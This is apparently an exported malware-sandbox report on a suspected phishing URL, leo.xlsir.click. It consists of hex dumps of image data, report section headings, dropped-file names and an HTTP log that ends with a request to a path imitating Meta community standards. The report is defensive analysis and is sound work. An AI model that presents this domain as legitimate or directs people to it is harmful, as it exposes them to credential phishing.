5a 99 dd cd fc 8e 0f 38 66 76 4c e3 98 76 40 3b f6 Data Ascii: PNGIHDR8hpHYssRGBgAMAa\|`IDATxsQP)"QD%E]fdoBoe+l$"{7q}~>\|<>q^;>Fy>E:1c*yG9wx0&%IZ8fvLv@;
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 96 74 f3 5d c7 d7 54 b6 48 ef 15 d7 c5 a9 be 3e fe 21 00 00 00 00 00 00 a0 03 98 34 a8 21 0f 7a 4e e2 e6 7b 8e ef 38 de 27 84 a7 1d 67 38 4e 72 5c 41 9e 77 0c e4 6b 66 2a 37 eb 3a 36 54 ab 90 71 d3 c4 ee 83 23 7c 5d 5c 22 00 00 00 00 00 00 60 14 98 34 a8 11 0f 7c ce ee e6 27 8e 15 1c 93 08 83 79 d0 f1 33 b5 06 49 1f 15 1a cb d7 4c d4 f3 d8 46 ad 9d 05 53 09 b7 aa 75 0f 39 ce d7 c6 b3 02 00 00 00 00 00 00 86 89 49 83 1a f0 c0 e7 aa 6e 0e 70 cc 23 0c 47 e4 78 8f f4 45 31 79 70 a9 d0 18 d5 04 db 0e 8e 6f 0b e3 f3 b2 e3 58 c7 5e be 36 1e 12 00 00 00 00 00 00 d0 26 26 0d fa c8 03 9f fb ab 55 a4 75 6a 61 b4 ae 73 6c e7 01 d2 8b 85 62 f9 9a 89 82 c6 51 0c fc 4b 8e b7 09 43 79 c5 71 b4 63 6f 26 0f d0 44 be 67 2c ea 66 72 95 ef 15 5f e3 7f 14 80 b7 f0 7d 60 21 37 Data Ascii: t]TH>!4!zN{8'g8Nr\Awkf*7:6Tq#\|]\"`4\|'y3ILFSu9Inp#GxE1ypoX^6&&UujaslbQKCyqco&Dg,fr_}`!7
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 10 1e 04 3b d5 cd 8e 02 fe 27 f2 b9 5f ef be f1 41 61 bc aa 5c f7 17 89 9d 39 4d b2 b2 e3 8f 3e f7 b3 08 40 9d 6d ef eb 74 2a 01 65 d9 5d 08 ac c6 05 50 22 16 7f 00 40 1f 31 69 30 1e fe a8 fe 93 9b af 08 78 ab d9 d4 aa 73 b0 b2 f0 26 3e 26 5f 53 6b c2 e0 9d 42 d3 2c e4 f8 8b fb c0 82 02 ea 85 81 b4 ff 99 56 d4 98 41 41 fc cc d9 ce 0d 13 d6 2d dc eb 00 94 88 7b 1b 00 f4 11 93 06 03 f8 e3 e3 1d 8e 07 fc e3 c7 04 0c 2e 52 b1 44 4a 96 ad 85 d7 55 45 71 4f 14 9a 6c 26 c7 1f dc 17 16 15 80 ba da 9c 5d 41 28 81 fb 71 4c 82 6d 2f 00 40 c9 d8 69 00 00 7d c4 a4 41 c5 1f 1f 33 b8 79 c4 31 ab 80 a1 c5 b5 73 80 fb cd 31 6a 38 1f 83 9d dc 1c 29 56 82 a0 95 96 ea b2 2a 4d 15 50 07 7c 6c be d9 db 1d 7b 0b c8 6f 57 07 e9 b6 fe 87 9a 06 00 4a c4 f7 25 00 f4 11 93 06 7a 7d Data Ascii: ;'_Aa\9M>@mte]P"@1i0xs&>&_SkB,VAA-{.RDJUEqOl&]A(qLm/@i}A3y1s1j8)VMP\|l{oWJ%z}
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 59 f0 03 c7 ac 1e 9c df d1 f1 b8 6a c8 7f ae 5b 62 32 43 ad e2 c9 db 3b 1e 51 f3 c4 20 e5 d9 ee 8f ef 12 d0 39 bc 0f 0c df 74 8e 5d 04 f4 cf 8e 6a ed ca 44 fb b8 d7 01 28 11 f7 36 00 e8 a3 62 26 0d aa dc a7 7f 75 bc 43 40 1e b1 c2 3c 8a 23 f7 73 85 ff cf d5 2a d2 5b 9a d8 71 34 87 07 e3 77 8f 55 fd 4a c0 7f ce 67 1d fb 38 62 f2 60 7d c7 c3 6a 96 f9 1c 27 08 40 bf 6d ea e7 d2 18 01 3d e6 7e 17 cf bf ad 05 00 00 00 a0 af 4a da 69 f0 47 c7 8c 02 f2 89 82 dd bf f6 87 f2 a4 ea 31 ff 37 0f 52 ab 30 6f 49 ce 72 cc e5 81 f7 cd ea ba b3 a0 1d fe b3 1f e3 98 c5 3f 6e ea 78 4c cd b1 9a fb e5 76 02 d0 4f 6f 77 ec 2b a0 f7 a2 df bd 53 00 00 00 00 fa aa 88 49 03 0f 30 45 ae f2 c5 04 e4 b5 84 5a a9 59 26 51 8f 54 05 c3 b7 54 39 a2 98 f1 ea 1e 68 5f cd 71 97 0a e1 df e5 Data Ascii: Yj[b2C;Q 9t]jD(6b&uC@<#s*[q4wUJg8b`}j'@m=~JiG17R0oIr?nxLvOow+SI0EZY&QTT9h_q
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 6f e8 3e be 84 00 f4 c3 a7 7d fd 2d 2b 60 84 dc 7f 96 76 f3 69 01 00 30 61 a4 27 02 80 3e ca b2 d3 e0 02 b1 1a 29 c4 8a eb 4f 79 20 70 0d 15 2a f2 d6 3b e2 63 f2 1b 8e b4 3b 28 ba 28 72 ff 9e ed 0f ee f7 0e f6 0f f8 ef 4d ef e6 97 ca eb a7 ee 03 5f 17 3a c2 c7 f2 fb 6e 0e 56 79 7e 26 00 fd 72 a8 9f 35 d9 52 5c a2 06 dc 6f e2 7d fe 08 01 00 30 34 c6 80 00 a0 8f 6a ff c1 e7 8f 8b d5 dc cc 24 fc 5d ad da 05 17 ab 01 fc 7b 1e e7 e6 c3 8e 3f 0b e3 7a 8f 5a c5 8d 07 f3 73 b5 0a 4d 67 f4 33 9f fb 0d 85 8e f2 31 dd 4a e5 a5 2a 9a c7 cf 07 52 9a 61 28 ac 50 eb 8e a8 6b b0 ae 80 e1 8b 45 21 f3 0b 9d c6 bd 0e 00 00 00 1d 55 eb 49 03 0f 08 4d 26 56 23 85 23 3d e8 37 7f e4 ff 57 83 f8 f7 bd d3 f1 51 ff 78 88 30 ae 45 7c 7d 9c 34 ee 5f f4 5f db d1 cd a7 94 d3 79 8e 0d Data Ascii: o>}-+`vi0a'>)Oy p;c;((rM_:nVy~&r5R\o}04j$]{?zZsMg31JRa(PkE!UIM&V##=7WQx0E\|}4__y
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: cd 05 ca 6f 7f 01 e8 87 4d 3c 69 37 46 68 0c 9f ef b9 d4 2a 80 0c 00 40 27 b0 d3 00 00 fa a8 6f 93 06 fe b0 58 c0 cd 9a 6a 86 27 3d 00 f7 31 a1 2f 7c ec 6f 71 b3 b8 28 8e dc 2b af 38 3e e7 e3 fe bc 90 dd d7 1c 8f 2a b7 a5 fc bc f9 94 d0 54 7c 6c f6 4f 14 24 df 5b 68 92 03 1d 13 0b fd c0 bd 0e 40 89 d8 69 00 00 7d d4 cf 9d 06 3f 54 33 c4 4b fc 27 85 be f2 00 f6 dd 6e 3e e1 b8 5f e8 b6 8d 7d bc 6f 12 d2 f3 79 7c 5a ad fa 06 d9 ed 23 20 a7 3b 95 5b 14 24 ff a8 50 3c 9f e7 48 07 f9 39 e5 75 9b 72 63 d2 00 40 89 b8 b7 01 40 1f 4d a2 3e f0 87 c5 7c 6e 56 57 33 ec 59 ad 74 47 9f f9 3c 3c ec be f7 19 ff f8 47 c7 d4 42 37 9c ef e3 7c 8c 50 0c 9f cf df fb ba 39 d1 3f ae a3 bc 16 f1 ef f0 05 ff 2e 67 09 c8 65 1b 47 f6 7e fb 23 b5 26 ed 51 b6 43 94 db 56 8e f3 95 17 Data Ascii: oM<i7Fh@'oXj'=1/\|oq(+8>T\|lO$[h@i}?T3K'n>_}oy\|Z# ;[$P<H9urc@@M>\|nVW3YtG<<GB7\|P9?.geG~#&QCV
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: a8 d5 4c 64 02 91 4b 6e 1f a1 51 aa 2d e2 fb 2a af 98 2c df 49 40 32 55 5a 9f 1d 94 5b 6c 97 e6 b9 51 86 43 95 3b 55 dd 77 05 f4 91 07 0f de e6 58 c9 f1 4b b5 52 65 fd 44 ad 5c d3 4c 18 0c 2e 9e 21 ab 3a 7e ee 78 d4 c7 ee 10 c7 dc 02 50 67 d4 dc e9 30 df f7 a6 71 6c ed b8 53 ad 9d 58 df 12 13 06 e3 9a 54 ad 5d 17 bf 8d e3 e4 d8 c4 d1 ef dd 17 29 6b b4 f4 e4 a5 c4 27 67 76 37 6b a9 6c b1 f2 76 67 21 a5 6a d5 71 a4 2c 79 55 68 47 cc dc 7e d9 c7 8d 97 80 66 3a 58 ad 0f dc ac d6 f2 73 29 73 e1 4e 34 d7 51 8e 3b 95 db 9a be fe 96 10 d2 f2 f9 8b 95 d0 2b 29 af 33 fd fe 72 8d 80 3e f0 f5 f3 1e 47 7c 33 de ed b8 c0 b1 9a 63 12 61 b8 62 c7 eb e6 8e db 7c 3c 7f 13 69 39 62 22 46 00 ea 86 eb b2 43 a2 be a0 e3 68 ff f8 b0 e3 00 91 29 a3 5d 71 9c 0e 73 3c e4 e3 b7 2f Data Ascii: LdKnQ-*,I@2UZ[lQC;UwXKReD\L.!:~xPg0qlSXT])k'gv7klvg!jq,yUhG~f:Xs)sN4Q;+)3r>G\|3cab\|<i9b"FCh)]qs</
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 68 53 aa b2 d3 60 80 8d 55 ee 36 d9 a7 94 7b 70 0c 23 e0 0f ce 4b d5 4a 03 d1 44 bb 0b 18 82 af 91 d3 dd dc a6 9c 66 f4 4b c0 9a 02 f2 da 56 f9 1d 24 d4 51 f6 9d 86 df 57 33 90 fe a1 cb fc 9e f0 51 37 d7 ab f5 3d 90 b9 be 07 de 2a 26 0c ae 8f 01 a1 36 d2 02 02 c0 b0 f9 de b2 a4 5a 3b f3 d9 5d 90 53 8c 6f ef e1 f3 78 ae 63 2a 35 48 c7 07 f6 ab 07 ed b7 55 ae 03 ab 74 00 68 9e 9d 1d 7f 52 f3 7c d4 d7 f5 f7 04 0c 2d f3 16 ef cc f9 ba 31 b8 d2 6b 1a bc ce ef 25 51 90 fc 2a e5 b6 ac 7f df cf 08 b5 e1 f3 b1 b6 5a 29 3c b2 da df d7 c6 bd 6d fe b3 d9 07 dd 99 34 e8 22 5f 0b fb b9 b9 d6 b1 a0 50 aa 48 95 17 05 df ff e0 f3 3d 93 00 a0 43 aa 34 68 bf 77 bc 57 c8 6e 15 b5 26 99 e7 d3 f0 91 9e a8 b2 9a e3 dd 2a 53 e4 b5 3f 44 68 a4 01 f5 0d 9e 56 f3 ec ee 1b e3 5c 02 Data Ascii: hS`U6{p#KJDfKV$QW3Q7=&6Z;]Soxc5HUthR\|-1k%QZ)<m4"_PH=C4hwWn&S?DhV\
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 02 46 6f 05 f7 a7 a3 04 a0 31 aa 94 44 51 c3 20 f3 7b 13 7a 63 66 c7 05 ee 33 63 77 34 36 76 a7 41 a9 05 23 7f e5 0f 90 ec 45 04 d1 23 be 11 bc 4b cd 2d 98 bd 8a 7f ff 2f 0a 18 bf ac 93 4a 4b ba 5f cf 2c 64 97 3a 65 87 fb e0 24 1a bd ed 1c ff 56 6e 07 f8 58 b0 22 b8 0b aa 02 7e bb 2a af 3b d5 99 5d 6d d9 d3 fb 14 b7 92 b3 1b dc df 97 73 73 b6 a3 13 f7 56 20 ac ef 7e b5 a5 00 14 af 4a 49 76 81 63 01 01 ed 59 d0 71 5c f5 73 63 0b 21 97 ba 1a 33 7b 31 38 f4 56 6c eb 9f 4d cd 75 84 1f a2 53 0b 78 ab 28 98 fd b2 72 fa b2 80 e4 26 9a 68 a2 87 94 3f c5 cf 18 c7 e6 42 37 ec ea 98 56 79 6d e9 3e ce 2a 7b 0c a9 9a 30 88 1a 06 14 b0 45 a7 c5 c4 f6 a7 05 60 7c 4a aa 69 f0 2b 95 9b 65 05 dd f3 15 3f 23 b6 56 52 a3 9a 34 f0 2f 3e 97 9b 0f aa 3c 77 f9 03 e4 12 01 6d f0 Data Ascii: Fo1DQ {zcf3cw46vA#E#K-/JK_,d:e$VnX"~;]mssV ~JIvcYq\sc!3{18VlMuSx(r&h?B7Vym>{0E`\|Ji+e?#VR4/><wm
2024-05-27 22:35:30 UTC	1369	IN	Data Raw: 81 93 cc db d9 c7 27 52 4f 5c 20 60 10 55 5a a2 ac f9 d8 fb ed 48 1f bf f9 fd 51 f1 8a 80 d6 2a c0 ac 93 06 bb 08 28 84 ef c9 4f 54 1f 47 99 d3 4d c6 20 d4 4e 8e ad 84 a1 64 2e 7e 1c 36 13 26 24 5d ce e8 4e f2 bd 6c 19 95 51 e4 7d b4 ee 73 9c e4 38 ce f7 f8 3b d5 27 fe 6f 47 aa a3 8b aa 88 f3 13 63 07 2b 3a be e1 f8 bc 5a 29 8f 9a 64 59 1f 83 af fb b8 b0 48 11 a8 29 5f a3 91 b6 8b ba 95 ed 8b c9 80 cb 1d 7f 70 fc 5d ad 49 82 3b 7d 9f 7b 49 1d e6 73 33 a9 5a 35 75 e3 1c c5 a4 ce 47 aa 40 0f 0c fb 05 d3 27 ec 14 37 6b a9 2c 87 b8 73 6f 29 60 10 ee f7 b1 7a e9 7b c2 48 ed e1 6b 6c 67 a1 f1 7c 2d c5 73 e7 29 e5 5c 71 16 75 6f 1e 13 d2 a0 a6 c1 84 f9 f8 bc dd cd ed 8e 31 ca 2b 6a 1a cc 13 29 97 84 f1 f2 79 8e 55 be 7f 54 5e c7 fb fc ae a7 2e a2 a6 41 5e d5 2e Data Ascii: 'RO\ `UZHQ*(OTGM Nd.~6&$]NlQ}s8;'oGc+:Z)dYH)_p]I;}{Is3Z5uG@'7k,so)`z{Hklg\|-s)\quo1+j)yUT^.A^.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://leo.xlsir.click/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 153

Static File Info

Network Behavior

Windows Analysis Report
https://leo.xlsir.click/

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:30 UTC	606	OUT	GET /images%20/logo.meta.png HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/home.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:31 UTC	617	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 22:35:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-powered-by: DLEMP Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a7ba89142b7-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:31 UTC	555	IN	Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-05-27 22:35:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:30 UTC	549	OUT	GET /static/js/main.a3de5fef.js HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://leo.xlsir.click/home.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:32 UTC	629	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 22:35:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-powered-by: DLEMP Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8OlEyMGG%2BWUGjgPl%2F7sEInqrkTPkYYEoQlMMGtfnzzafnVPP%2BaZUZgMo%2B0oG5%2B0PJcK6%2B0lLpAFw1FRqFWkYdV%2BEFeeNeNiPj0DlTHnDrMts%2B4dyie%2B2MXnVxMX6AmxjXM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a7eea3a7c7e-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:32 UTC	555	IN	Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-05-27 22:35:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:30 UTC	638	OUT	GET /static/media/background.1f85623d06212e6d3ed4.png HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/css/main.02.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:32 UTC	621	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 22:35:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-powered-by: DLEMP Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XonXz73k589dOKMyN3lHiKGdMkUOW6ncDahpHXptEyvUbh4kFVSqTEHPy%2Fv%2FvROjx1TTL8Fwfx2E7eJY%2BKExrHrThaq1jGHkAnnM3%2Fwa%2By5G1rwjFdorT1DK51YWDUAJp9M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a7ee9f742bb-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:32 UTC	555	IN	Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-05-27 22:35:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:32 UTC	536	OUT	OPTIONS /report/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://leo.xlsir.click Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:32 UTC	336	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 27 May 2024 22:35:31 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:32 UTC	478	OUT	POST /report/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 442 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:32 UTC	442	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 36 35 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 65 6f 2e 78 6c 73 69 72 2e 63 6c 69 63 6b 2f 68 6f 6d 65 2e 70 68 70 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 36 2e 31 36 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f Data Ascii: [{"age":0,"body":{"elapsed_time":1656,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://leo.xlsir.click/home.php","sampling_fraction":1.0,"server_ip":"172.67.156.167","status_code":404,"type":"http.error"},"type":"network-erro
2024-05-27 22:35:32 UTC	168	IN	HTTP/1.1 200 OK content-length: 0 date: Mon, 27 May 2024 22:35:32 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:41 UTC	669	OUT	GET /meta-community-standard/buiness HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
